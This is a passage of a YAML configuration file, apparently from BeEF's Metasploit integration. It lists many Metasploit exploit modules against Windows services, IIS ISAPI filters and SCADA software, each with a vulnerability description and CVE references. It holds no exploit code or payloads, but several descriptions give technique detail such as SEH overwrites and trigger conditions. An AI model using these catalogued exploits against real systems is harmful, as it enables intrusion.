\t\t\t\t\t\tThis module exploits a stack buffer overflow in Race river's Integard Home/Pro\n\ + \t\t\t\t\tinternet content filter HTTP Server. Versions prior to 2.0.0.9037 and 2.2.0.9037 are\n\ + \t\t\t\t\tvulnerable.\n\n\ + \t\t\t\t\tThe administration web page on port 18881 is vulnerable to a remote buffer overflow\n\ + \t\t\t\t\tattack. By sending an long character string in the password field, both the structured\n\ + \t\t\t\t\texception handler and the saved extended instruction pointer are over written, allowing\n\ + \t\t\t\t\tan attacker to gain control of the application and the underlying operating system\n\ + \t\t\t\t\tremotely.\n\n\ + \t\t\t\t\tThe administration website service runs with SYSTEM privileges, and automatically\n\ + \t\t\t\t\trestarts when it crashes.\n\ + \t\t\t" + authors: + - - OSVDB + - "67909" + - - URL + - http://www.corelan.be:8800/advisories.php?id=CORELAN-10-061 + path: extensions/metasploit/ + class: Msf_module +msf_hp_nnm_getnnmdata_hostname: + enable: true + msf: true + msf_key: windows/http/hp_nnm_getnnmdata_hostname + name: HP OpenView Network Node Manager getnnmdata.exe (Hostname) CGI Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53.\n\ + \t\t\t\tBy sending specially crafted Hostname parameter to the getnnmdata.exe CGI,\n\ + \t\t\t\tan attacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2010-1555 + - - OSVDB + - "64976" + path: extensions/metasploit/ + class: Msf_module +msf_nowsms: + enable: true + msf: true + msf_key: windows/http/nowsms + name: Now SMS/MMS Gateway Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Now SMS/MMS Gateway v2007.06.27.\n\ + \t\t\t\tBy sending a specially crafted GET request, an attacker may be able to execute\n\ + \t\t\t\tarbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2008-0871 + - - OSVDB + - "42953" + - - BID + - "27896" + path: extensions/metasploit/ + class: Msf_module +msf_sambar6_search_results: + enable: true + msf: true + msf_key: windows/http/sambar6_search_results + name: Sambar 6 Search Results Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\tThis module exploits a buffer overflow found in the\n\ + \t\t\t/search/results.stm application that comes with Sambar 6.\n\ + \t\t\tThis code is a direct port of Andrew Griffiths's SMUDGE\n\ + \t\t\texploit, the only changes made were to the nops and payload.\n\ + \t\t\tThis exploit causes the service to die, whether you provided\n\ + \t\t\tthe correct target or not.\n\ + \t\t\t" + authors: + - - CVE + - 2004-2086 + - - OSVDB + - "5786" + - - BID + - "9607" + path: extensions/metasploit/ + class: Msf_module +msf_kolibri_http: + enable: true + msf: true + msf_key: windows/http/kolibri_http + name: Kolibri <= v2.0 HTTP Server HEAD Buffer Overflow + category: Metasploit + description: This exploits a stack buffer overflow in version 2 of the Kolibri HTTP server. + authors: + - - CVE + - 2002-2268 + - - OSVDB + - "70808" + - - BID + - "6289" + - - URL + - http://www.exploit-db.com/exploits/15834/ + path: extensions/metasploit/ + class: Msf_module +msf_ca_igateway_debug: + enable: true + msf: true + msf_key: windows/http/ca_igateway_debug + name: CA iTechnology iGateway Debug Mode Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a vulnerability in the Computer Associates\n\ + \t\t\t\tiTechnology iGateway component. When True is enabled\n\ + \t\t\t\tin igateway.conf (non-default), it is possible to overwrite the stack\n\ + \t\t\t\tand execute code remotely. This module works best with Ordinal payloads.\n\ + \t\t\t" + authors: + - - CVE + - 2005-3190 + - - OSVDB + - "19920" + - - URL + - http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=33485 + - - URL + - http://www.milw0rm.com/exploits/1243 + - - BID + - "15025" + path: extensions/metasploit/ + class: Msf_module +msf_shttpd_post: + enable: true + msf: true + msf_key: windows/http/shttpd_post + name: SHTTPD <= 1.34 URI-Encoded POST Request Overflow (win32) + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in SHTTPD <= 1.34.\n\ + \t\t\t\tThe vulnerability is caused due to a boundary error within the\n\ + \t\t\t\thandling of POST requests. Based on an original exploit by skOd\n\ + \t\t\t\tbut using a different method found by hdm.\n\ + \t\t\t" + authors: + - - CVE + - 2006-5216 + - - OSVDB + - "29565" + - - URL + - http://shttpd.sourceforge.net + - - BID + - "20393" + path: extensions/metasploit/ + class: Msf_module +msf_badblue_passthru: + enable: true + msf: true + msf_key: windows/http/badblue_passthru + name: BadBlue 2.72b PassThru Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the PassThru\n\ + \t\t\t\tfunctionality in ext.dll in BadBlue 2.72b and earlier.\n\ + \t\t\t" + authors: + - - CVE + - 2007-6377 + - - OSVDB + - "42416" + - - BID + - "26803" + path: extensions/metasploit/ + class: Msf_module +msf_hp_nnm_nnmrptconfig_nameparams: + enable: true + msf: true + msf_key: windows/http/hp_nnm_nnmrptconfig_nameparams + name: HP OpenView NNM nnmRptConfig nameParams Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a vulnerability in HP NNM's nnmRptConfig.exe.\n\ + \t\t\t\tA remote user can send a long string data to the nameParams parameter via\n\ + \t\t\t\ta POST request, which causes an overflow on the stack when function\n\ + \t\t\t\tov.sprintf_new() is used, and gain arbitrary code execution.'\n\ + \t\t\t" + authors: + - - CVE + - 2011-0266 + - - URL + - http://www.zerodayinitiative.com/advisories/ZDI-11-008/ + path: extensions/metasploit/ + class: Msf_module +msf_edirectory_host: + enable: true + msf: true + msf_key: windows/http/edirectory_host + name: Novell eDirectory NDS Server Host Header Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Novell eDirectory 8.8.1.\n\ + \t\t\t\tThe web interface does not validate the length of the\n\ + \t\t\t\tHTTP Host header prior to using the value of that header in an\n\ + \t\t\t\tHTTP redirect.\n\ + \t\t\t" + authors: + - - CVE + - 2006-5478 + - - OSVDB + - "29993" + - - BID + - "20655" + path: extensions/metasploit/ + class: Msf_module +msf_badblue_ext_overflow: + enable: true + msf: true + msf_key: windows/http/badblue_ext_overflow + name: BadBlue 2.5 EXT.dll Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis is a stack buffer overflow exploit for BadBlue version 2.5.\n\ + \t\t\t" + authors: + - - CVE + - 2005-0595 + - - OSVDB + - "14238" + - - BID + - "7387" + path: extensions/metasploit/ + class: Msf_module +msf_novell_imanager_upload: + enable: true + msf: true + msf_key: windows/http/novell_imanager_upload + name: Novell iManager getMultiPartParameters Arbitrary File Upload + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a directory traversal vulnerability which\n\ + \t\t\t\tallows remote attackers to upload and execute arbitrary code.\n\n\ + \t\t\t\tPortalModuleInstallManager\n\ + \t\t\t" + authors: + - - OSVDB + - "68320" + - - URL + - http://www.zerodayinitiative.com/advisories/ZDI-10-190/ + - - URL + - http://www.novell.com/support/viewContent.do?externalId=7006515&sliceId=2 + path: extensions/metasploit/ + class: Msf_module +msf_adobe_robohelper_authbypass: + enable: true + msf: true + msf_key: windows/http/adobe_robohelper_authbypass + name: Adobe RoboHelp Server 8 Arbitrary File Upload and Execute + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits an authentication bypass vulnerability which\n\ + \t\t\t\tallows remote attackers to upload and execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2009-3068 + - - OSVDB + - "57896" + - - URL + - http://www.intevydis.com/blog/?p=69 + - - URL + - http://www.zerodayinitiative.com/advisories/ZDI-09-066 + path: extensions/metasploit/ + class: Msf_module +msf_minishare_get_overflow: + enable: true + msf: true + msf_key: windows/http/minishare_get_overflow + name: Minishare 1.4.1 Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis is a simple buffer overflow for the minishare web\n\ + \t\t\t\tserver. This flaw affects all versions prior to 1.4.2. This\n\ + \t\t\t\tis a plain stack buffer overflow that requires a \"jmp esp\" to reach\n\ + \t\t\t\tthe payload, making this difficult to target many platforms\n\ + \t\t\t\tat once. This module has been successfully tested against\n\ + \t\t\t\t1.4.1. Version 1.3.4 and below do not seem to be vulnerable.\n\ + \t\t\t" + authors: + - - CVE + - 2004-2271 + - - OSVDB + - "11530" + - - BID + - "11620" + - - URL + - http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.html + path: extensions/metasploit/ + class: Msf_module +msf_hp_nnm_ovalarm_lang: + enable: true + msf: true + msf_key: windows/http/hp_nnm_ovalarm_lang + name: HP OpenView Network Node Manager ovalarm.exe CGI Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53.\n\ + \t\t\t\tBy sending a specially crafted CGI request to ovalarm.exe, an attacker can execute\n\ + \t\t\t\tarbitrary code.\n\n\ + \t\t\t\tThis specific vulnerability is due to a call to \"sprintf_new\" in the \"isWide\"\n\ + \t\t\t\tfunction within \"ovalarm.exe\". A stack buffer overflow occurs when processing an\n\ + \t\t\t\tHTTP request that contains the following.\n\n\ + \t\t\t\t1. An \"Accept-Language\" header longer than 100 bytes\n\ + \t\t\t\t2. An \"OVABverbose\" URI variable set to \"on\", \"true\" or \"1\"\n\n\ + \t\t\t\tThe vulnerability is related to \"_WebSession::GetWebLocale()\" ..\n\n\ + \t\t\t\tNOTE: This exploit has been tested successfully with a reverse_ord_tcp payload.\n\ + \t\t\t" + authors: + - - CVE + - 2009-4179 + - - OSVDB + - "60930" + - - BID + - "37347" + - - URL + - http://dvlabs.tippingpoint.com/advisory/TPTI-09-12 + - - URL + - http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01950877 + path: extensions/metasploit/ + class: Msf_module +msf_coldfusion_fckeditor: + enable: true + msf: true + msf_key: windows/http/coldfusion_fckeditor + name: ColdFusion 8.0.1 Arbitrary File Upload and Execute + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits the Adobe ColdFusion 8.0.1 FCKeditor 'CurrentFolder' File Upload\n\ + \t\t\t\tand Execute vulnerability.\n\ + \t\t\t" + authors: + - - CVE + - 2009-2265 + - - OSVDB + - "55684" + path: extensions/metasploit/ + class: Msf_module +msf_altn_securitygateway: + enable: true + msf: true + msf_key: windows/http/altn_securitygateway + name: Alt-N SecurityGateway username Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tAlt-N SecurityGateway is prone to a buffer overflow condition. This\n\ + \t\t\t\tis due to insufficient bounds checking on the \"username\"\n\ + \t\t\t\tparameter. Successful exploitation could result in code\n\ + \t\t\t\texecution with SYSTEM level privileges.\n\n\ + \t\t\t\tNOTE: This service doesn't restart, you'll only get one shot. However,\n\ + \t\t\t\tit often survives a successful exploitation attempt.\n\ + \t\t\t" + authors: + - - CVE + - 2008-4193 + - - OSVDB + - "45854" + - - BID + - "29457" + path: extensions/metasploit/ + class: Msf_module +msf_apache_mod_rewrite_ldap: + enable: true + msf: true + msf_key: windows/http/apache_mod_rewrite_ldap + name: Apache module mod_rewrite LDAP protocol Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits the mod_rewrite LDAP protocol scheme handling\n\ + \t\t\t\tflaw discovered by Mark Dowd, which produces an off-by-one overflow.\n\ + \t\t\t\tApache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable.\n\ + \t\t\t\tThis module requires REWRITEPATH to be set accurately. In addition,\n\ + \t\t\t\tthe target must have 'RewriteEngine on' configured, with a specific\n\ + \t\t\t\t'RewriteRule' condition enabled to allow for exploitation.\n\n\ + \t\t\t\tThe flaw affects multiple platforms, however this module currently\n\ + \t\t\t\tonly supports Windows based installations.\n\ + \t\t\t" + authors: + - - CVE + - 2006-3747 + - - OSVDB + - "27588" + - - BID + - "19204" + - - URL + - http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html + - - URL + - http://www.milw0rm.com/exploits/3680 + - - URL + - http://www.milw0rm.com/exploits/3996 + - - URL + - http://www.milw0rm.com/exploits/2237 + path: extensions/metasploit/ + class: Msf_module +msf_hp_nnm_ovwebhelp: + enable: true + msf: true + msf_key: windows/http/hp_nnm_ovwebhelp + name: HP OpenView Network Node Manager OvWebHelp.exe CGI Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.\n\ + \t\t\t\tBy sending a specially crafted CGI request to OvWebHelp.exe, an attacker may be able to execute\n\ + \t\t\t\tarbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2009-4178 + - - OSVDB + - "60929" + - - BID + - "37340" + path: extensions/metasploit/ + class: Msf_module +msf_kerio_auth: + enable: true + msf: true + msf_key: windows/firewall/kerio_auth + name: Kerio Firewall 2.1.4 Authentication Packet Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a stack buffer overflow in Kerio Personal Firewall\n\ + \t\t\t\tadministration authentication process. This module has only been tested\n\ + \t\t\t\tagainst Kerio Personal Firewall 2 (2.1.4).\n\ + \t\t\t" + authors: + - - CVE + - 2003-0220 + - - OSVDB + - "6294" + - - BID + - "7180" + - - URL + - http://www1.corest.com/common/showdoc.php?idx=314&idxseccion=10 + path: extensions/metasploit/ + class: Msf_module +msf_blackice_pam_icq: + enable: true + msf: true + msf_key: windows/firewall/blackice_pam_icq + name: ISS PAM.dll ICQ Parser Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the ISS products that use\n\ + \t\t\t\tthe iss-pam1.dll ICQ parser (Blackice/RealSecure). Successful exploitation\n\ + \t\t\t\twill result in arbitrary code execution as LocalSystem. This exploit\n\ + \t\t\t\tonly requires 1 UDP packet, which can be both spoofed and sent to a broadcast\n\ + \t\t\t\taddress.\n\n\ + \t\t\t\tThe ISS exception handler will recover the process after each overflow, giving\n\ + \t\t\t\tus the ability to bruteforce the service and exploit it multiple times.\n\ + \t\t\t" + authors: + - - CVE + - 2004-0362 + - - OSVDB + - "4355" + - - URL + - http://www.eeye.com/html/Research/Advisories/AD20040318.html + - - URL + - http://xforce.iss.net/xforce/alerts/id/166 + path: extensions/metasploit/ + class: Msf_module +msf_energizer_duo_payload: + enable: true + msf: true + msf_key: windows/backdoor/energizer_duo_payload + name: Energizer DUO Trojan Code Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module will execute an arbitrary payload against\n\ + \t\t\t\tany system infected with the Arugizer trojan horse. This\n\ + \t\t\t\tbackdoor was shipped with the software package accompanying\n\ + \t\t\t\tthe Energizer Duo USB battery charger.\n\ + \t\t\t" + authors: + - - CVE + - 2010-0103 + - - OSVDB + - "62782" + - - US-CERT-VU + - "154421" + path: extensions/metasploit/ + class: Msf_module +msf_ms07_029_msdns_zonename: + enable: true + msf: true + msf_key: windows/smb/ms07_029_msdns_zonename + name: Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB) + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the RPC interface\n\ + \t\t\t\tof the Microsoft DNS service. The vulnerability is triggered\n\ + \t\t\t\twhen a long zone name parameter is supplied that contains\n\ + \t\t\t\tescaped octal strings. This module is capable of bypassing NX/DEP\n\ + \t\t\t\tprotection on Windows 2003 SP1/SP2. This module exploits the\n\ + \t\t\t\tRPC service using the \\DNSSERVER pipe available via SMB. This\n\ + \t\t\t\tpipe requires a valid user account to access, so the SMBUSER\n\ + \t\t\t\tand SMBPASS options must be specified.\n\ + \t\t\t" + authors: + - - CVE + - 2007-1748 + - - OSVDB + - "34100" + - - MSB + - MS07-029 + - - URL + - http://www.microsoft.com/technet/security/advisory/935964.mspx + path: extensions/metasploit/ + class: Msf_module +msf_ms05_017_msmq: + enable: true + msf: true + msf_key: windows/dcerpc/ms05_017_msmq + name: Microsoft Message Queueing Service Path Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a stack buffer overflow in the RPC interface\n\ + \t\t\t\tto the Microsoft Message Queueing service. The offset to the\n\ + \t\t\t\treturn address changes based on the length of the system\n\ + \t\t\t\thostname, so this must be provided via the 'HNAME' option.\n\ + \t\t\t\tMuch thanks to snort.org and Jean-Baptiste Marchand's\n\ + \t\t\t\texcellent MSRPC website.\n\n\ + \t\t\t" + authors: + - - CVE + - 2005-0059 + - - OSVDB + - "15458" + - - MSB + - MS05-017 + - - BID + - "13112" + path: extensions/metasploit/ + class: Msf_module +msf_ms07_065_msmq: + enable: true + msf: true + msf_key: windows/dcerpc/ms07_065_msmq + name: Microsoft Message Queueing Service DNS Name Path Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a stack buffer overflow in the RPC interface\n\ + \t\t\tto the Microsoft Message Queueing service. This exploit requires\n\ + \t\t\tthe target system to have been configured with a DNS name and\n\ + \t\t\tfor that name to be supplied in the 'DNAME' option. This name does\n\ + \t\t\tnot need to be served by a valid DNS server, only configured on\n\ + \t\t\tthe target machine.\n\n\ + \t\t\t" + authors: + - - CVE + - 2007-3039 + - - OSVDB + - "39123" + - - MSB + - MS07-065 + path: extensions/metasploit/ + class: Msf_module +msf_ms03_026_dcom: + enable: true + msf: true + msf_key: windows/dcerpc/ms03_026_dcom + name: Microsoft RPC DCOM Interface Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the RPCSS service, this vulnerability\n\ + \t\t\t\twas originally found by the Last Stage of Delirium research group and has been\n\ + \t\t\t\twidely exploited ever since. This module can exploit the English versions of\n\ + \t\t\t\tWindows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request :)\n\ + \t\t\t" + authors: + - - CVE + - 2003-0352 + - - OSVDB + - "2100" + - - MSB + - MS03-026 + - - BID + - "8205" + path: extensions/metasploit/ + class: Msf_module +msf_name_service: + enable: true + msf: true + msf_key: windows/backupexec/name_service + name: Veritas Backup Exec Name Service Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a vulnerability in the Veritas Backup\n\ + \t\t\t\tExec Agent Browser service. This vulnerability occurs when a\n\ + \t\t\t\trecv() call has a length value too long for the\tdestination\n\ + \t\t\t\tstack buffer. By sending an agent name value of 63 bytes or\n\ + \t\t\t\tmore, we can overwrite the return address of the recv\n\ + \t\t\t\tfunction. Since we only have ~60 bytes of contiguous space\n\ + \t\t\t\tfor shellcode, a tiny findsock payload is sent which uses a\n\ + \t\t\t\thardcoded IAT address for the recv() function. This payload\n\ + \t\t\t\twill then roll the stack back to the beginning of the page,\n\ + \t\t\t\trecv() the real shellcode into it, and jump to it. This\n\ + \t\t\t\tmodule has been tested against Veritas 9.1 SP0, 9.1 SP1, and\n\ + \t\t\t\t8.6.\n\ + \t\t\t" + authors: + - - CVE + - 2004-1172 + - - OSVDB + - "12418" + - - BID + - "11974" + - - URL + - http://www.idefense.com/application/poi/display?id=169&type=vulnerabilities + path: extensions/metasploit/ + class: Msf_module +msf_remote_agent: + enable: true + msf: true + msf_key: windows/backupexec/remote_agent + name: Veritas Backup Exec Windows Remote Agent Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the Veritas\n\ + \t\t\t\tBackupExec Windows Agent software. This vulnerability occurs\n\ + \t\t\t\twhen a client authentication request is received with type\n\ + \t\t\t\t'3' and a long password argument. Reliable execution is\n\ + \t\t\t\tobtained by abusing the stack buffer overflow to smash a SEH\n\ + \t\t\t\tpointer.\n\ + \t\t\t" + authors: + - - CVE + - 2005-0773 + - - OSVDB + - "17624" + - - BID + - "14022" + - - URL + - http://www.idefense.com/application/poi/display?id=272&type=vulnerabilities + - - URL + - http://seer.support.veritas.com/docs/276604.htm + path: extensions/metasploit/ + class: Msf_module +msf_w3who_query: + enable: true + msf: true + msf_key: windows/isapi/w3who_query + name: Microsoft IIS ISAPI w3who.dll Query String Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the w3who.dll ISAPI\n\ + \t\t\t\tapplication. This vulnerability was discovered Nicolas\n\ + \t\t\t\tGregoire and this code has been successfully tested against\n\ + \t\t\t\tWindows 2000 and Windows XP (SP2). When exploiting Windows\n\ + \t\t\t\tXP, the payload must call RevertToSelf before it will be\n\ + \t\t\t\table to spawn a command shell.\n\n\ + \t\t\t" + authors: + - - CVE + - 2004-1134 + - - OSVDB + - "12258" + - - URL + - http://www.exaprobe.com/labs/advisories/esa-2004-1206.html + - - BID + - "11820" + path: extensions/metasploit/ + class: Msf_module +msf_rsa_webagent_redirect: + enable: true + msf: true + msf_key: windows/isapi/rsa_webagent_redirect + name: Microsoft IIS ISAPI RSA WebAgent Redirect Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a stack buffer overflow in the SecurID Web\n\ + \t\t\t\tAgent for IIS. This ISAPI filter runs in-process with\n\ + \t\t\t\tinetinfo.exe, any attempt to exploit this flaw will result\n\ + \t\t\t\tin the termination and potential restart of the IIS service.\n\n\ + \t\t\t" + authors: + - - CVE + - 2005-4734 + - - OSVDB + - "20151" + path: extensions/metasploit/ + class: Msf_module +msf_ms03_022_nsiislog_post: + enable: true + msf: true + msf_key: windows/isapi/ms03_022_nsiislog_post + name: Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis exploits a buffer overflow found in the nsiislog.dll\n\ + \t\t\t\tISAPI filter that comes with Windows Media Server. This\n\ + \t\t\t\tmodule will also work against the 'patched' MS03-019\n\ + \t\t\t\tversion. This vulnerability was addressed by MS03-022.\n\ + \t\t\t" + authors: + - - CVE + - 2003-0349 + - - OSVDB + - "4535" + - - BID + - "8035" + - - MSB + - MS03-022 + - - URL + - http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0120.html + path: extensions/metasploit/ + class: Msf_module +msf_ms00_094_pbserver: + enable: true + msf: true + msf_key: windows/isapi/ms00_094_pbserver + name: Microsoft IIS Phone Book Service Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis is an exploit for the Phone Book Service /pbserver/pbserver.dll\n\ + \t\t\t\tdescribed in MS00-094. By sending an overly long URL argument\n\ + \t\t\t\tfor phone book updates, it is possible to overwrite the stack. This\n\ + \t\t\t\tmodule has only been tested against Windows 2000 SP1.\n\ + \t\t\t" + authors: + - - CVE + - 2000-1089 + - - OSVDB + - "463" + - - BID + - "2048" + - - MSB + - MS00-094 + path: extensions/metasploit/ + class: Msf_module +msf_ms03_051_fp30reg_chunked: + enable: true + msf: true + msf_key: windows/isapi/ms03_051_fp30reg_chunked + name: Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis is an exploit for the chunked encoding buffer overflow\n\ + \t\t\t\tdescribed in MS03-051 and originally reported by Brett\n\ + \t\t\t\tMoore. This particular modules works against versions of\n\ + \t\t\t\tWindows 2000 between SP0 and SP3. Service Pack 4 fixes the\n\ + \t\t\t\tissue.\n\ + \t\t\t" + authors: + - - CVE + - 2003-0822 + - - OSVDB + - "2952" + - - BID + - "9007" + - - MSB + - MS03-051 + path: extensions/metasploit/ + class: Msf_module +msf_cam_log_security: + enable: true + msf: true + msf_key: windows/unicenter/cam_log_security + name: CA CAM log_security() Stack Buffer Overflow (Win32) + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a vulnerability in the CA CAM service\n\ + \t\t\t\tby passing a long parameter to the log_security() function.\n\ + \t\t\t\tThe CAM service is part of TNG Unicenter. This module has\n\ + \t\t\t\tbeen tested on Unicenter v3.1.\n\ + \t\t\t" + authors: + - - CVE + - 2005-2668 + - - OSVDB + - "18916" + - - BID + - "14622" + path: extensions/metasploit/ + class: Msf_module +msf_igss9_igssdataserver_listall: + enable: true + msf: true + msf_key: windows/scada/igss9_igssdataserver_listall + name: 7-Technologies IGSS <= v9.00.00 b11063 IGSSdataServer.exe Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a vulnerability in the igssdataserver.exe component of 7-Technologies\n\ + \t\t\t\tIGSS up to version 9.00.00 b11063. While processing a ListAll command, the application\n\ + \t\t\t\tfails to do proper bounds checking before copying data into a small buffer on the stack.\n\ + \t\t\t\tThis causes a buffer overflow and allows to overwrite a structured exception handling record\n\ + \t\t\t\ton the stack, allowing for unauthenticated remote code execution. Also, after the payload\n\ + \t\t\t\texits, IGSSdataServer.exe should automatically recover.\n\ + \t\t\t" + authors: + - - CVE + - 2011-1567 + - - OSVDB + - "72353" + - - URL + - http://aluigi.altervista.org/adv/igss_2-adv.txt + path: extensions/metasploit/ + class: Msf_module +msf_factorylink_vrn_09: + enable: true + msf: true + msf_key: windows/scada/factorylink_vrn_09 + name: Siemens FactoryLink vrn.exe Opcode 9 Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in FactoryLink 7.5, 7.5 SP2,\n\ + \t\t\t\tand 8.0.1.703. By sending a specially crafted packet, an attacker may be able to\n\ + \t\t\t\texecute arbitrary code due to the improper use of a vsprintf() function while\n\ + \t\t\t\tprocessing the user-supplied text field. Originally found and posted by\n\ + \t\t\t\tLuigi Auriemma.\n\ + \t\t\t" + authors: + - - OSVDB + - "72815" + - - URL + - http://aluigi.altervista.org/adv/factorylink_4-adv.txt + path: extensions/metasploit/ + class: Msf_module +msf_realwin: + enable: true + msf: true + msf_key: windows/scada/realwin + name: DATAC RealWin SCADA Server Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in DATAC Control\n\ + \t\t\t\tInternational RealWin SCADA Server 2.0 (Build 6.0.10.37).\n\ + \t\t\t\tBy sending a specially crafted FC_INFOTAG/SET_CONTROL packet,\n\ + \t\t\t\tan attacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2008-4322 + - - OSVDB + - "48606" + - - BID + - "31418" + path: extensions/metasploit/ + class: Msf_module +msf_realwin_scpc_initialize: + enable: true + msf: true + msf_key: windows/scada/realwin_scpc_initialize + name: DATAC RealWin SCADA Server SCPC_INITIALIZE Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in DATAC Control\n\ + \t\t\t\tInternational RealWin SCADA Server 2.0 (Build 6.1.8.10).\n\ + \t\t\t\tBy sending a specially crafted packet, an attacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - OSVDB + - "68812" + - - CVE + - 2010-4142 + - - URL + - http://aluigi.altervista.org/adv/realwin_1-adv.txt + path: extensions/metasploit/ + class: Msf_module +msf_iconics_genbroker: + enable: true + msf: true + msf_key: windows/scada/iconics_genbroker + name: Iconics GENESIS32 Integer overflow version 9.21.201.01 + category: Metasploit + description: "\n\ + \t\t\t\t\tThe GenBroker service on port 38080 is affected by three integer overflow\n\ + \t\t\t\tvulnerabilities while handling opcode 0x4b0, which is caused by abusing the\n\ + \t\t\t\tthe memory allocations needed for the number of elements passed by the client.\n\ + \t\t\t\tThis results unexpected behaviors such as direct registry calls, memory location\n\ + \t\t\t\tcalls, or arbitrary remote code execution. Please note that in order to ensure\n\ + \t\t\t\treliability, this exploit will try to open calc (hidden), inject itself into the\n\ + \t\t\t\tprocess, and then open up a shell session. Also, DEP bypass is supported.\n\ + \t\t\t" + authors: + - - URL + - http://aluigi.org/adv/genesis_4-adv.txt + path: extensions/metasploit/ + class: Msf_module +msf_moxa_mdmtool: + enable: true + msf: true + msf_key: windows/scada/moxa_mdmtool + name: MOXA Device Manager Tool 2.1 Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in MOXA MDM Tool 2.1.\n\ + \t\t\t\tWhen sending a specially crafted MDMGw (MDM2_Gateway) response, an\n\ + \t\t\t\tattacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - OSVDB + - "69027" + - - URL + - http://www.reversemode.com/index.php?option=com_content&task=view&id=70&Itemid= + - - URL + - http://www.us-cert.gov/control_systems/pdf/ICS-Alert-10-293-02.pdf + path: extensions/metasploit/ + class: Msf_module +msf_iconics_webhmi_setactivexguid: + enable: true + msf: true + msf_key: windows/scada/iconics_webhmi_setactivexguid + name: ICONICS WebHMI ActiveX Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a vulnerability found in ICONICS WebHMI's ActiveX control.\n\ + \t\t\t\tBy supplying a long string of data to the 'SetActiveXGUID' parameter, GenVersion.dll\n\ + \t\t\t\tfails to do any proper bounds checking before this input is copied onto the stack,\n\ + \t\t\t\twhich causes a buffer overflow, and results arbitrary code execution under the context\n\ + \t\t\t\tof the user.\n\ + \t\t\t" + authors: + - - OSVDB + - "72135" + - - URL + - http://www.security-assessment.com/files/documents/advisory/ICONICS_WebHMI.pdf + - - URL + - http://www.exploit-db.com/exploits/17240/ + path: extensions/metasploit/ + class: Msf_module +msf_igss9_igssdataserver_rename: + enable: true + msf: true + msf_key: windows/scada/igss9_igssdataserver_rename + name: 7-Technologies IGSS 9 IGSSdataServer .RMS Rename Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a vulnerability found on 7-Technologies IGSS 9. By supplying\n\ + \t\t\t\ta long string of data to the 'Rename' (0x02), 'Delete' (0x03), or 'Add' (0x04) command,\n\ + \t\t\t\ta buffer overflow condition occurs in IGSSdataServer.exe while handing an RMS report,\n\ + \t\t\t\twhich results arbitrary code execution under the context of the user.\n\n\ + \t\t\t\tThe attack is carried out in three stages. The first stage sends the final payload to\n\ + \t\t\t\tIGSSdataServer.exe, which will remain in memory. The second stage sends the Add command\n\ + \t\t\t\tso the process can find a valid ID for the Rename command. The last stage then triggers\n\ + 